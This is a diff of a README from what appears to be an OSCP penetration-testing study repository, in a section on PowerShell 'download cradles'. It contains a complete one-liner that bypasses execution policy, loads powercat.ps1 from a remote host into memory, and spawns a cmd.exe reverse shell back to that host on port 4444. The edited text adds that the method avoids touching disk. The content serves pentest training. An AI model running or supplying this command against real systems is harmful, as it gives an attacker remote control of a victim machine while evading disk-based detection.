V-i-x-x/Resources/OSCP Resource/Readme.md

 ## Powershell Usefull Cradles to Download Script to memory and Execute it

-This Example will download Powercat to memory and execute a reverse shell using Powercat
+This Example will download Powercat to memory and execute a reverse shell using Powercat without touching the disk

 ```
 powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.Webclient).DownloadString("http://172.16.242.173/powercat.ps1"); powercat -c 172.16.242.173 -p 4444 -e cmd.exe